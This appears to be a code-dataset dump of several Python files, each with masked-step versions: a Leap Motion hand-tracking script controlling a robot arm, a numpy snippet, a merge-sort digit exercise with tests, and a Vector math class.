            # Send command to robot
            if goal_curr != []:
                goal = goal_curr
                print("goal: ", goal)
                blue.set_joint_positions(goal, duration=3, soft_position_control=False)
                blue.command_gripper(grab_strength, 10.0, wait=False)

            # Wait for system to settle
            i+=1
            time.sleep(3)

    # Direct motor angle mapping approach
    else:
        if "Right hand" in hands_data.keys():
            hand_data = hands_data["Right hand"]
            pos = hand_data['palm_position']
            ori = [hand_data['palm_pitch'], hand_data['palm_roll'], hand_data['palm_yaw']]
            grab_strength = hand_data['grab_strength']

            pos[0], pos[1], pos[2] = pos[2], pos[0], pos[1]  # z x y to x y z
            ori[0], ori[1], ori[2] = ori[2], ori[0], ori[1]  # z y x to x y z
            target_position = [x/1000 for x in pos]  # x, y, z
            target_position[0] += 0.05
            target_position[2] -= 0.2

            # Pre-defined Initial position of the robot
            target_angles = target_angles_init.copy()

            # orientation
            target_angles[0] += (ori[0]*1 + target_position[1]*1.5)  # shoulder dir
            target_angles[4] += ori[2]    # arm twist
            target_angles[5] += ori[1]*2  # wrist up down
            target_angles[6] += ori[2]    # wrist twist

            # height
            target_angles[1] += target_position[2]*5
            target_angles[3] -= target_position[2]*5

            # depth direction stretch
            target_angles[3] -= target_position[0]*10

            smoothening = True
            if smoothening:
                alpha = 0.9
                target_angles = target_angles*(1-alpha) + target_angles_hist*alpha
                target_angles_hist = target_angles

            # Send command to robot
            print("target_angles: ", target_angles)
            blue.set_joint_positions(target_angles, duration=0.0025, soft_position_control=False)

        if "Left hand" in hands_data.keys():
            hand_data = hands_data["Left hand"]
            pos = hand_data['palm_position']
            ori = [hand_data['palm_pitch'], hand_data['palm_roll'], hand_data['palm_yaw']]
            grab_strength = hand_data['grab_strength']
            blue.command_gripper(ori[1], 20.0, wait=False)

        # Wait for system to settle
        i+=1
        time.sleep(0.025)
normal
{ "blob_id": "b34e293b509328c728909262594bdf3d3ecf5360", "index": 4364, "step-1": "<mask token>\n", "step-2": "<mask token>\nparser.add_argument('--IK', default=False, action='store_true', help=\n 'switch to IK-control')\n<mask token>\nblue.calibrate_gripper()\n<mask token>\nwhile True:\n hands_data = listener.get_hand(controller)\n if args.IK:\n if 'Right hand' in hands_data.keys():\n hand_data = hands_data['Right hand']\n pos = hand_data['palm_position']\n ori = [hand_data['palm_pitch'], hand_data['palm_roll'],\n hand_data['palm_yaw']]\n grab_strength = hand_data['grab_strength']\n target_position = [(x / 1000) for x in pos]\n pos[0], pos[1], pos[2] = pos[2], pos[0], pos[1]\n ori[0], ori[1], ori[2] = ori[2], -ori[0] + 3.14, ori[1]\n target_position[0] -= 0.4\n target_position[2] += 0.3\n target_orientation = list(euler2quat(ori))\n goal_curr = blue.inverse_kinematics(target_position,\n target_orientation)\n if goal_curr != []:\n goal = goal_curr\n print('goal: ', goal)\n blue.set_joint_positions(goal, duration=3,\n soft_position_control=False)\n blue.command_gripper(grab_strength, 10.0, wait=False)\n i += 1\n time.sleep(3)\n else:\n if 'Right hand' in hands_data.keys():\n hand_data = hands_data['Right hand']\n pos = hand_data['palm_position']\n ori = [hand_data['palm_pitch'], hand_data['palm_roll'],\n hand_data['palm_yaw']]\n grab_strength = hand_data['grab_strength']\n pos[0], pos[1], pos[2] = pos[2], pos[0], pos[1]\n ori[0], ori[1], ori[2] = ori[2], ori[0], ori[1]\n target_position = [(x / 1000) for x in pos]\n target_position[0] += 0.05\n target_position[2] -= 0.2\n target_angles = target_angles_init.copy()\n target_angles[0] += ori[0] * 1 + target_position[1] * 1.5\n target_angles[4] += ori[2]\n target_angles[5] += ori[1] * 2\n target_angles[6] += ori[2]\n target_angles[1] += target_position[2] * 5\n target_angles[3] -= target_position[2] * 5\n target_angles[3] -= target_position[0] * 10\n smoothening = True\n if smoothening:\n alpha = 0.9\n target_angles = target_angles * (1 - alpha\n ) + target_angles_hist * alpha\n target_angles_hist = target_angles\n print('target_angles: ', target_angles)\n blue.set_joint_positions(target_angles, duration=0.0025,\n soft_position_control=False)\n if 'Left hand' in hands_data.keys():\n hand_data = hands_data['Left hand']\n pos = hand_data['palm_position']\n ori = [hand_data['palm_pitch'], hand_data['palm_roll'],\n hand_data['palm_yaw']]\n grab_strength = hand_data['grab_strength']\n blue.command_gripper(ori[1], 20.0, wait=False)\n i += 1\n time.sleep(0.025)\n", "step-3": "<mask token>\nparser = argparse.ArgumentParser(description='switch the control mode')\nparser.add_argument('--IK', default=False, action='store_true', help=\n 'switch to IK-control')\nargs = parser.parse_args()\nside = 'right'\nip = '127.0.0.1'\nblue = BlueInterface(side, ip)\nblue.calibrate_gripper()\nlistener = SampleListener()\ncontroller = Leap.Controller()\ntarget_angles_init = np.array([0.0, -0.85, 1.571, 0, -1.571, -0.2, 0.0])\ntarget_angles_hist = target_angles_init.copy()\ni = 0\nwhile True:\n hands_data = listener.get_hand(controller)\n if args.IK:\n if 'Right hand' in hands_data.keys():\n hand_data = hands_data['Right hand']\n pos = hand_data['palm_position']\n ori = [hand_data['palm_pitch'], hand_data['palm_roll'],\n hand_data['palm_yaw']]\n grab_strength = hand_data['grab_strength']\n target_position = [(x / 1000) for x in pos]\n pos[0], pos[1], pos[2] = pos[2], pos[0], pos[1]\n ori[0], ori[1], ori[2] = ori[2], -ori[0] + 3.14, ori[1]\n target_position[0] -= 0.4\n 
target_position[2] += 0.3\n target_orientation = list(euler2quat(ori))\n goal_curr = blue.inverse_kinematics(target_position,\n target_orientation)\n if goal_curr != []:\n goal = goal_curr\n print('goal: ', goal)\n blue.set_joint_positions(goal, duration=3,\n soft_position_control=False)\n blue.command_gripper(grab_strength, 10.0, wait=False)\n i += 1\n time.sleep(3)\n else:\n if 'Right hand' in hands_data.keys():\n hand_data = hands_data['Right hand']\n pos = hand_data['palm_position']\n ori = [hand_data['palm_pitch'], hand_data['palm_roll'],\n hand_data['palm_yaw']]\n grab_strength = hand_data['grab_strength']\n pos[0], pos[1], pos[2] = pos[2], pos[0], pos[1]\n ori[0], ori[1], ori[2] = ori[2], ori[0], ori[1]\n target_position = [(x / 1000) for x in pos]\n target_position[0] += 0.05\n target_position[2] -= 0.2\n target_angles = target_angles_init.copy()\n target_angles[0] += ori[0] * 1 + target_position[1] * 1.5\n target_angles[4] += ori[2]\n target_angles[5] += ori[1] * 2\n target_angles[6] += ori[2]\n target_angles[1] += target_position[2] * 5\n target_angles[3] -= target_position[2] * 5\n target_angles[3] -= target_position[0] * 10\n smoothening = True\n if smoothening:\n alpha = 0.9\n target_angles = target_angles * (1 - alpha\n ) + target_angles_hist * alpha\n target_angles_hist = target_angles\n print('target_angles: ', target_angles)\n blue.set_joint_positions(target_angles, duration=0.0025,\n soft_position_control=False)\n if 'Left hand' in hands_data.keys():\n hand_data = hands_data['Left hand']\n pos = hand_data['palm_position']\n ori = [hand_data['palm_pitch'], hand_data['palm_roll'],\n hand_data['palm_yaw']]\n grab_strength = hand_data['grab_strength']\n blue.command_gripper(ori[1], 20.0, wait=False)\n i += 1\n time.sleep(0.025)\n", "step-4": "from blue_interface import BlueInterface\nimport numpy as np\nimport time\nimport sys\nimport argparse\nimport Leap\nfrom utils.rotations import quat2euler, euler2quat, mat2euler\nfrom utils.leap_listener import SampleListener\nimport matplotlib.pyplot as plt\nparser = argparse.ArgumentParser(description='switch the control mode')\nparser.add_argument('--IK', default=False, action='store_true', help=\n 'switch to IK-control')\nargs = parser.parse_args()\nside = 'right'\nip = '127.0.0.1'\nblue = BlueInterface(side, ip)\nblue.calibrate_gripper()\nlistener = SampleListener()\ncontroller = Leap.Controller()\ntarget_angles_init = np.array([0.0, -0.85, 1.571, 0, -1.571, -0.2, 0.0])\ntarget_angles_hist = target_angles_init.copy()\ni = 0\nwhile True:\n hands_data = listener.get_hand(controller)\n if args.IK:\n if 'Right hand' in hands_data.keys():\n hand_data = hands_data['Right hand']\n pos = hand_data['palm_position']\n ori = [hand_data['palm_pitch'], hand_data['palm_roll'],\n hand_data['palm_yaw']]\n grab_strength = hand_data['grab_strength']\n target_position = [(x / 1000) for x in pos]\n pos[0], pos[1], pos[2] = pos[2], pos[0], pos[1]\n ori[0], ori[1], ori[2] = ori[2], -ori[0] + 3.14, ori[1]\n target_position[0] -= 0.4\n target_position[2] += 0.3\n target_orientation = list(euler2quat(ori))\n goal_curr = blue.inverse_kinematics(target_position,\n target_orientation)\n if goal_curr != []:\n goal = goal_curr\n print('goal: ', goal)\n blue.set_joint_positions(goal, duration=3,\n soft_position_control=False)\n blue.command_gripper(grab_strength, 10.0, wait=False)\n i += 1\n time.sleep(3)\n else:\n if 'Right hand' in hands_data.keys():\n hand_data = hands_data['Right hand']\n pos = hand_data['palm_position']\n ori = [hand_data['palm_pitch'], 
hand_data['palm_roll'],\n hand_data['palm_yaw']]\n grab_strength = hand_data['grab_strength']\n pos[0], pos[1], pos[2] = pos[2], pos[0], pos[1]\n ori[0], ori[1], ori[2] = ori[2], ori[0], ori[1]\n target_position = [(x / 1000) for x in pos]\n target_position[0] += 0.05\n target_position[2] -= 0.2\n target_angles = target_angles_init.copy()\n target_angles[0] += ori[0] * 1 + target_position[1] * 1.5\n target_angles[4] += ori[2]\n target_angles[5] += ori[1] * 2\n target_angles[6] += ori[2]\n target_angles[1] += target_position[2] * 5\n target_angles[3] -= target_position[2] * 5\n target_angles[3] -= target_position[0] * 10\n smoothening = True\n if smoothening:\n alpha = 0.9\n target_angles = target_angles * (1 - alpha\n ) + target_angles_hist * alpha\n target_angles_hist = target_angles\n print('target_angles: ', target_angles)\n blue.set_joint_positions(target_angles, duration=0.0025,\n soft_position_control=False)\n if 'Left hand' in hands_data.keys():\n hand_data = hands_data['Left hand']\n pos = hand_data['palm_position']\n ori = [hand_data['palm_pitch'], hand_data['palm_roll'],\n hand_data['palm_yaw']]\n grab_strength = hand_data['grab_strength']\n blue.command_gripper(ori[1], 20.0, wait=False)\n i += 1\n time.sleep(0.025)\n", "step-5": "#!/usr/bin/env python2\n\n# A basic example of sending Blue a command in cartesian space.\nfrom blue_interface import BlueInterface\nimport numpy as np\nimport time\nimport sys\nimport argparse\n\nimport Leap\nfrom utils.rotations import quat2euler, euler2quat, mat2euler\nfrom utils.leap_listener import SampleListener\n\nimport matplotlib.pyplot as plt\n\nparser = argparse.ArgumentParser(description='switch the control mode')\nparser.add_argument('--IK', default=False, action='store_true',\n help='switch to IK-control')\nargs = parser.parse_args()\n\nside = \"right\"\nip = \"127.0.0.1\"\nblue = BlueInterface(side, ip)\n# Initialize the blue gripper\nblue.calibrate_gripper()\n\n# Leap Motion\nlistener = SampleListener()\ncontroller = Leap.Controller()\n\n\ntarget_angles_init = np.array([0.0, -0.85, 1.571, 0, -1.571, -0.2, 0.0])\ntarget_angles_hist = target_angles_init.copy()\n\ni = 0\nwhile True:\n hands_data = listener.get_hand(controller)\n\n ## IK approach\n if args.IK:\n if \"Right hand\" in hands_data.keys():\n hand_data = hands_data[\"Right hand\"]\n pos = hand_data['palm_position']\n ori = [hand_data['palm_pitch'], hand_data['palm_roll'], hand_data['palm_yaw']]\n grab_strength = hand_data['grab_strength']\n target_position = [x/1000 for x in pos] # x, y, z\n pos[0], pos[1], pos[2] = pos[2], pos[0], pos[1] # z x y to x y z\n ori[0], ori[1], ori[2] = ori[2], -ori[0]+3.14, ori[1] # z y x to x y z\n\n # Adjust the offset\n target_position[0] -= 0.4\n target_position[2] += 0.3\n target_orientation = list(euler2quat(ori)) # w, x, y, z\n # target_orientation = target_orientation[1:] + target_orientation[:1]\n\n # Compute IK solution\n goal_curr = blue.inverse_kinematics(target_position, target_orientation)\n # Send command to robot\n if goal_curr != []:\n goal = goal_curr\n print(\"goal: \", goal)\n blue.set_joint_positions(goal, duration=3, soft_position_control=False)\n blue.command_gripper(grab_strength, 10.0, wait=False)\n\n # Wait for system to settle\n i+=1\n time.sleep(3)\n\n # Direct motor angle mapping approach\n else:\n if \"Right hand\" in hands_data.keys():\n hand_data = hands_data[\"Right hand\"]\n pos = hand_data['palm_position']\n ori = [hand_data['palm_pitch'], hand_data['palm_roll'], hand_data['palm_yaw']]\n grab_strength = 
hand_data['grab_strength']\n\n pos[0], pos[1], pos[2] = pos[2], pos[0], pos[1] # z x y to x y z\n ori[0], ori[1], ori[2] = ori[2], ori[0], ori[1] # z y x to x y z\n target_position = [x/1000 for x in pos] # x, y, z\n target_position[0] += 0.05\n target_position[2] -= 0.2\n\n # Pre-defined Initial position of the robot\n target_angles = target_angles_init.copy()\n\n # orientation\n target_angles[0] += (ori[0]*1 + target_position[1]*1.5) # shoulder dir\n target_angles[4] += ori[2] # arm twist\n target_angles[5] += ori[1]*2 # wrist up down\n target_angles[6] += ori[2] # wrist twist\n\n # height\n target_angles[1] += target_position[2]*5\n target_angles[3] -= target_position[2]*5\n\n # depth direction stretch\n target_angles[3] -= target_position[0]*10\n\n smoothening = True\n if smoothening:\n alpha = 0.9\n target_angles = target_angles*(1-alpha) + target_angles_hist*alpha\n target_angles_hist = target_angles\n\n # Send command to robot\n print(\"target_angles: \", target_angles)\n blue.set_joint_positions(target_angles, duration=0.0025, soft_position_control=False)\n\n if \"Left hand\" in hands_data.keys():\n hand_data = hands_data[\"Left hand\"]\n pos = hand_data['palm_position']\n ori = [hand_data['palm_pitch'], hand_data['palm_roll'], hand_data['palm_yaw']]\n grab_strength = hand_data['grab_strength']\n blue.command_gripper(ori[1], 20.0, wait=False)\n\n # Wait for system to settle\n i+=1\n time.sleep(0.025)\n\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
import numpy as np

a = np.array([1, 2, 3])
b = np.r_[np.repeat(a, 3), np.tile(a, 3)]
print(b)
normal
{ "blob_id": "f39945f35b13c0918c3ef06224bca65ae6166ebc", "index": 5892, "step-1": "<mask token>\n", "step-2": "<mask token>\nprint(b)\n", "step-3": "<mask token>\na = np.array([1, 2, 3])\nb = np.r_[np.repeat(a, 3), np.tile(a, 3)]\nprint(b)\n", "step-4": "import numpy as np\na = np.array([1, 2, 3])\nb = np.r_[np.repeat(a, 3), np.tile(a, 3)]\nprint(b)\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
# Merge sort is used to sort the elements
def merge_sort(arr):
    if len(arr) > 1:
        # Recursion is used to continuously split the array in half.
        mid = len(arr) // 2

        # Using Auxiliary storage here
        left = arr[:mid]
        right = arr[mid:]

        # Traverse the left side of the array
        merge_sort(left)
        # Traverse the right side of the array
        merge_sort(right)

        # Then we merge the left and right side
        merge(arr, left, right)


def merge(arr, left, right):
    i = 0
    j = 0
    k = 0

    # I want the array to be in descending order
    while i < len(left) and j < len(right):
        # We let the array at k be the largest values
        if left[i] > right[j]:
            arr[k] = left[i]
            i += 1
        else:
            arr[k] = right[j]
            j += 1
        k += 1

    # One of the two arrays will be left with elements so we dump
    # which ever one still has items in it.
    while i < len(left):
        arr[k] = left[i]
        i += 1
        k += 1

    while j < len(right):
        arr[k] = right[j]
        j += 1
        k += 1


def rearrange_digits(input_list):
    if len(input_list) == 0:
        return []

    # We sort the list with merge sort
    merge_sort(input_list)

    first_number = ''
    second_number = ''
    for i in range(0, len(input_list)):
        if i % 2 == 0:
            first_number += str(input_list[i])
        else:
            second_number += str(input_list[i])

    # Convert them to ints and return the two numbers
    ans = [int(first_number), int(second_number)]
    return ans


def test_function(test_case):
    output = rearrange_digits(test_case[0])
    solution = test_case[1]
    if sum(output) == sum(solution):
        print("Pass")
    else:
        print("Fail")


# Test case 1:
test_function([[1, 2, 3, 4, 5], [542, 31]])

# Test case 2:
test_function([[4, 6, 2, 5, 9, 8], [964, 852]])

# Test case 3:
test_function([[1, 2, 3], [32, 1]])

# Test case 4:
test_function([[], []])

# Test case 5:
test_function([[9, 9, 9, 9, 9, 9], [999, 999]])
normal
{ "blob_id": "264b48c2b9ce4ec948ca5ba548e708848760f3dc", "index": 8271, "step-1": "<mask token>\n\n\ndef rearrange_digits(input_list):\n if len(input_list) == 0:\n return []\n merge_sort(input_list)\n first_number = ''\n second_number = ''\n for i in range(0, len(input_list)):\n if i % 2 == 0:\n first_number += str(input_list[i])\n else:\n second_number += str(input_list[i])\n ans = [int(first_number), int(second_number)]\n return ans\n\n\ndef test_function(test_case):\n output = rearrange_digits(test_case[0])\n solution = test_case[1]\n if sum(output) == sum(solution):\n print('Pass')\n else:\n print('Fail')\n\n\n<mask token>\n", "step-2": "def merge_sort(arr):\n if len(arr) > 1:\n mid = len(arr) // 2\n left = arr[:mid]\n right = arr[mid:]\n merge_sort(left)\n merge_sort(right)\n merge(arr, left, right)\n\n\n<mask token>\n\n\ndef rearrange_digits(input_list):\n if len(input_list) == 0:\n return []\n merge_sort(input_list)\n first_number = ''\n second_number = ''\n for i in range(0, len(input_list)):\n if i % 2 == 0:\n first_number += str(input_list[i])\n else:\n second_number += str(input_list[i])\n ans = [int(first_number), int(second_number)]\n return ans\n\n\ndef test_function(test_case):\n output = rearrange_digits(test_case[0])\n solution = test_case[1]\n if sum(output) == sum(solution):\n print('Pass')\n else:\n print('Fail')\n\n\n<mask token>\n", "step-3": "def merge_sort(arr):\n if len(arr) > 1:\n mid = len(arr) // 2\n left = arr[:mid]\n right = arr[mid:]\n merge_sort(left)\n merge_sort(right)\n merge(arr, left, right)\n\n\ndef merge(arr, left, right):\n i = 0\n j = 0\n k = 0\n while i < len(left) and j < len(right):\n if left[i] > right[j]:\n arr[k] = left[i]\n i += 1\n else:\n arr[k] = right[j]\n j += 1\n k += 1\n while i < len(left):\n arr[k] = left[i]\n i += 1\n k += 1\n while j < len(right):\n arr[k] = right[j]\n j += 1\n k += 1\n\n\ndef rearrange_digits(input_list):\n if len(input_list) == 0:\n return []\n merge_sort(input_list)\n first_number = ''\n second_number = ''\n for i in range(0, len(input_list)):\n if i % 2 == 0:\n first_number += str(input_list[i])\n else:\n second_number += str(input_list[i])\n ans = [int(first_number), int(second_number)]\n return ans\n\n\ndef test_function(test_case):\n output = rearrange_digits(test_case[0])\n solution = test_case[1]\n if sum(output) == sum(solution):\n print('Pass')\n else:\n print('Fail')\n\n\n<mask token>\n", "step-4": "def merge_sort(arr):\n if len(arr) > 1:\n mid = len(arr) // 2\n left = arr[:mid]\n right = arr[mid:]\n merge_sort(left)\n merge_sort(right)\n merge(arr, left, right)\n\n\ndef merge(arr, left, right):\n i = 0\n j = 0\n k = 0\n while i < len(left) and j < len(right):\n if left[i] > right[j]:\n arr[k] = left[i]\n i += 1\n else:\n arr[k] = right[j]\n j += 1\n k += 1\n while i < len(left):\n arr[k] = left[i]\n i += 1\n k += 1\n while j < len(right):\n arr[k] = right[j]\n j += 1\n k += 1\n\n\ndef rearrange_digits(input_list):\n if len(input_list) == 0:\n return []\n merge_sort(input_list)\n first_number = ''\n second_number = ''\n for i in range(0, len(input_list)):\n if i % 2 == 0:\n first_number += str(input_list[i])\n else:\n second_number += str(input_list[i])\n ans = [int(first_number), int(second_number)]\n return ans\n\n\ndef test_function(test_case):\n output = rearrange_digits(test_case[0])\n solution = test_case[1]\n if sum(output) == sum(solution):\n print('Pass')\n else:\n print('Fail')\n\n\ntest_function([[1, 2, 3, 4, 5], [542, 31]])\ntest_function([[4, 6, 2, 5, 9, 8], [964, 852]])\ntest_function([[1, 
2, 3], [32, 1]])\ntest_function([[], []])\ntest_function([[9, 9, 9, 9, 9, 9], [999, 999]])\n", "step-5": "# Merge sort is used to sort the elements\ndef merge_sort(arr):\n if len(arr) > 1:\n # Recursion is used to continuously split the array in half.\n mid = len(arr) // 2\n # Using Auxiliary storage here\n left = arr[:mid]\n right = arr[mid:]\n # Traverse the left side of the array\n merge_sort(left)\n # Traverse the right side of the array\n merge_sort(right)\n # Then we merge the left and right side\n merge(arr, left, right)\n\n\ndef merge(arr, left, right):\n i = 0\n j = 0\n k = 0\n # I want the array to be in descending order\n while i < len(left) and j < len(right):\n # We let the array at k be the largest values\n if left[i] > right[j]:\n arr[k] = left[i]\n i += 1\n else:\n arr[k] = right[j]\n j += 1\n k += 1\n\n # One of the two arrays will be left with elements so we dump\n # which ever one still has items in it.\n while i < len(left):\n arr[k] = left[i]\n i += 1\n k += 1\n while j < len(right):\n arr[k] = right[j]\n j += 1\n k += 1\n\n\ndef rearrange_digits(input_list):\n\n if len(input_list) == 0:\n return []\n\n # We sort the list with merge sort\n merge_sort(input_list)\n\n first_number = ''\n second_number = ''\n\n for i in range(0, len(input_list)):\n if i % 2 == 0:\n first_number += str(input_list[i])\n else:\n second_number += str(input_list[i])\n # Convert them to ints and return the two numbers\n ans = [int(first_number), int(second_number)]\n return ans\n\n\ndef test_function(test_case):\n output = rearrange_digits(test_case[0])\n solution = test_case[1]\n if sum(output) == sum(solution):\n print(\"Pass\")\n else:\n print(\"Fail\")\n\n\n# Test case 1:\ntest_function([[1, 2, 3, 4, 5], [542, 31]])\n\n# Test case 2:\ntest_function([[4, 6, 2, 5, 9, 8], [964, 852]])\n\n# Test case 3:\ntest_function([[1, 2, 3], [32, 1]])\n\n# Test case 4:\ntest_function([[], []])\n\n# Test case 5:\ntest_function([[9, 9, 9, 9, 9, 9], [999, 999]])", "step-ids": [ 2, 3, 4, 5, 6 ] }
[ 2, 3, 4, 5, 6 ]
# -*- coding: utf-8 -*-

from math import acos, pi, sqrt
from decimal import Decimal, getcontext

getcontext().prec = 30


class Vector(object):
    NO_NONZERO_ELTS_FOUND_MSG = 'No nonzero elements found'

    def __init__(self, coordinates):
        try:
            if not coordinates:
                raise ValueError
            self.coordinates = tuple([Decimal(x) for x in coordinates])
            self.dimension = len(coordinates)
        except ValueError:
            raise ValueError('The coordinates must be nonempty')
        except TypeError:
            raise TypeError('The coordinates must be an iterable')

    def __str__(self):
        return 'Vector: {}'.format(self.coordinates)

    def __eq__(self, v):
        return self.coordinates == v.coordinates

    def iszero(self, tolerance=1e-10):
        return self.magnitude() < tolerance

    def plus(self, v):
        if isinstance(v, Vector):
            if self.dimension == v.dimension:
                return Vector([x+y for x, y in zip(self.coordinates, v.coordinates)])
            else:
                raise ValueError('dimension not match.')
        else:
            raise TypeError('not a Vector.')

    def minus(self, v):
        if isinstance(v, Vector):
            if self.dimension == v.dimension:
                return Vector([x-y for x, y in zip(self.coordinates, v.coordinates)])
            else:
                raise ValueError('dimension not match.')
        else:
            raise TypeError('not a Vector.')

    def time_scalar(self, scalar):
        try:
            return Vector([Decimal(scalar) * x for x in self.coordinates])
        except Exception:
            raise TypeError('{0} is not a number'.format(scalar))

    def magnitude(self):
        return Decimal(sqrt(sum([x**2 for x in self.coordinates])))

    def normalize(self):
        if self.iszero():
            raise ValueError("Can't normalize a zero vector.")
        else:
            return self.time_scalar(Decimal(1.0)/self.magnitude())

    def dot(self, v):
        if not isinstance(v, Vector):
            raise TypeError('not a Vector')
        else:
            if self.dimension != v.dimension:
                raise ValueError('dimension not match.')
            else:
                return sum([x*y for x, y in zip(self.coordinates, v.coordinates)])

    def angle_with(self, v, in_degree=False, tolerance=1e-10):
        if not isinstance(v, Vector):
            raise TypeError('not a Vector')
        if self.dimension != v.dimension:
            raise ValueError('dimension not match.')
        d = self.dot(v)/(self.magnitude()*v.magnitude())
        if abs(abs(d)-1) < tolerance:
            d = 1 if d > 0 else -1
        elif abs(d) < tolerance:
            d = 0
        if in_degree:
            return acos(d)/pi*180
        else:
            return acos(d)

    def is_parallel_to(self, v):
        if not isinstance(v, Vector):
            raise TypeError('not a Vector')
        if self.iszero() or v.iszero():
            return True
        v1 = self.normalize()
        v2 = v.normalize()
        return (v1.minus(v2).iszero() or
                v1.plus(v2).iszero())

    def is_parallel_to2(self, v):
        if not isinstance(v, Vector):
            raise TypeError('not a Vector')
        if self.iszero() or v.iszero():
            return True
        n = Vector.first_nonzero_index(self.coordinates)
        if (v.coordinates[n] == 0):
            return False
        if abs(self.coordinates[n]) <= abs(v.coordinates[n]):
            return self.time_scalar(v.coordinates[n] / self.coordinates[n]).minus(v).iszero()
        else:
            return v.time_scalar(self.coordinates[n] / v.coordinates[n]).minus(self).iszero()

    def is_parallel_to3(self, v):
        if not isinstance(v, Vector):
            raise TypeError('not a Vector')
        return (self.iszero() or
                v.iszero() or
                self.angle_with(v) == 0 or
                self.angle_with(v) == pi)

    def is_orthogonal_to(self, v, tolerance=1e-10):
        if not isinstance(v, Vector):
            raise TypeError('not a Vector')
        return abs(self.dot(v)) < tolerance

    def component_project_to(self, v):
        if not isinstance(v, Vector):
            raise TypeError('not a Vector')
        return v.normalize().time_scalar(self.dot(v.normalize()))

    def component_orthogonal_to(self, v):
        if not isinstance(v, Vector):
            raise TypeError('not a Vector')
        return self.minus(self.project(v))

    def cross(self, v):
        if not isinstance(v, Vector):
            raise TypeError('not a Vector')
        r = []
        if ((self.dimension != v.dimension) or
                (self.dimension == 1) or
                (v.dimension == 1)):
            raise ValueError('dimensions not match')
        if (self.dimension == v.dimension == 2):
            z1 = z2 = Decimal(0.0)
        if (self.dimension == v.dimension == 3):
            z1 = self.coordinates[2]
            z2 = v.coordinates[2]
        r.append(self.coordinates[1]*z2 - v.coordinates[1]*z1)
        r.append(v.coordinates[0]*z1 - self.coordinates[0]*z2)
        r.append(self.coordinates[0]*v.coordinates[1] - v.coordinates[0]*self.coordinates[1])
        return Vector(r)

    def parallelogram_area(self, v):
        if not isinstance(v, Vector):
            raise TypeError('not a Vector')
        return self.cross(v).magnitude()

    @staticmethod
    def first_nonzero_index(iterable):
        for k, item in enumerate(iterable):
            if not MyDecimal(item).is_near_zero():
                return k
        raise Exception(Vector.NO_NONZERO_ELTS_FOUND_MSG)

    def __getitem__(self, i):
        return self.coordinates[i]

    def __setitem__(self, i, x):
        self.coordinates[i] = x


class MyDecimal(Decimal):
    def is_near_zero(self, eps=1e-10):
        return abs(self) < eps
normal
{ "blob_id": "1253e052865860a6895f91204a70152745b04652", "index": 8498, "step-1": "<mask token>\n\n\nclass Vector(object):\n <mask token>\n\n def __init__(self, coordinates):\n try:\n if not coordinates:\n raise ValueError\n self.coordinates = tuple([Decimal(x) for x in coordinates])\n self.dimension = len(coordinates)\n except ValueError:\n raise ValueError('The coordinates must be nonempty')\n except TypeError:\n raise TypeError('The coordinates must be an iterable')\n\n def __str__(self):\n return 'Vector: {}'.format(self.coordinates)\n <mask token>\n\n def iszero(self, tolerance=1e-10):\n return self.magnitude() < tolerance\n\n def plus(self, v):\n if isinstance(v, Vector):\n if self.dimension == v.dimension:\n return Vector([(x + y) for x, y in zip(self.coordinates, v.\n coordinates)])\n else:\n raise ValueError('dimension not match.')\n else:\n raise TypeError('not a Vector.')\n <mask token>\n <mask token>\n\n def magnitude(self):\n return Decimal(sqrt(sum([(x ** 2) for x in self.coordinates])))\n <mask token>\n <mask token>\n <mask token>\n\n def is_parallel_to(self, v):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n if self.iszero() or v.iszero():\n return True\n v1 = self.normalize()\n v2 = v.normalize()\n return v1.minus(v2).iszero() or v1.plus(v2).iszero()\n\n def is_parallel_to2(self, v):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n if self.iszero() or v.iszero():\n return True\n n = Vector.first_nonzero_index(self.coordinates)\n if v.coordinates[n] == 0:\n return False\n if abs(self.coordinates[n]) <= abs(v.coordinates[n]):\n return self.time_scalar(v.coordinates[n] / self.coordinates[n]\n ).minus(v).iszero()\n else:\n return v.time_scalar(self.coordinates[n] / v.coordinates[n]).minus(\n self).iszero()\n\n def is_parallel_to3(self, v):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n return self.iszero() or v.iszero() or self.angle_with(v\n ) == 0 or self.angle_with(v) == pi\n\n def is_orthogonal_to(self, v, tolerance=1e-10):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n return abs(self.dot(v)) < tolerance\n <mask token>\n\n def component_orthogonal_to(self, v):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n return self.minus(self.project(v))\n\n def cross(self, v):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n r = []\n if (self.dimension != v.dimension or self.dimension == 1 or v.\n dimension == 1):\n raise ValueError('dimensions not match')\n if self.dimension == v.dimension == 2:\n z1 = z2 = Decimal(0.0)\n if self.dimension == v.dimension == 3:\n z1 = self.coordinates[2]\n z2 = v.coordinates[2]\n r.append(self.coordinates[1] * z2 - v.coordinates[1] * z1)\n r.append(v.coordinates[0] * z1 - self.coordinates[0] * z2)\n r.append(self.coordinates[0] * v.coordinates[1] - v.coordinates[0] *\n self.coordinates[1])\n return Vector(r)\n\n def parallelogram_area(self, v):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n return self.cross(v).magnitude()\n <mask token>\n <mask token>\n <mask token>\n\n\nclass MyDecimal(Decimal):\n\n def is_near_zero(self, eps=1e-10):\n return abs(self) < eps\n", "step-2": "<mask token>\n\n\nclass Vector(object):\n <mask token>\n\n def __init__(self, coordinates):\n try:\n if not coordinates:\n raise ValueError\n self.coordinates = tuple([Decimal(x) for x in coordinates])\n self.dimension = len(coordinates)\n except ValueError:\n raise ValueError('The coordinates must be nonempty')\n except TypeError:\n raise 
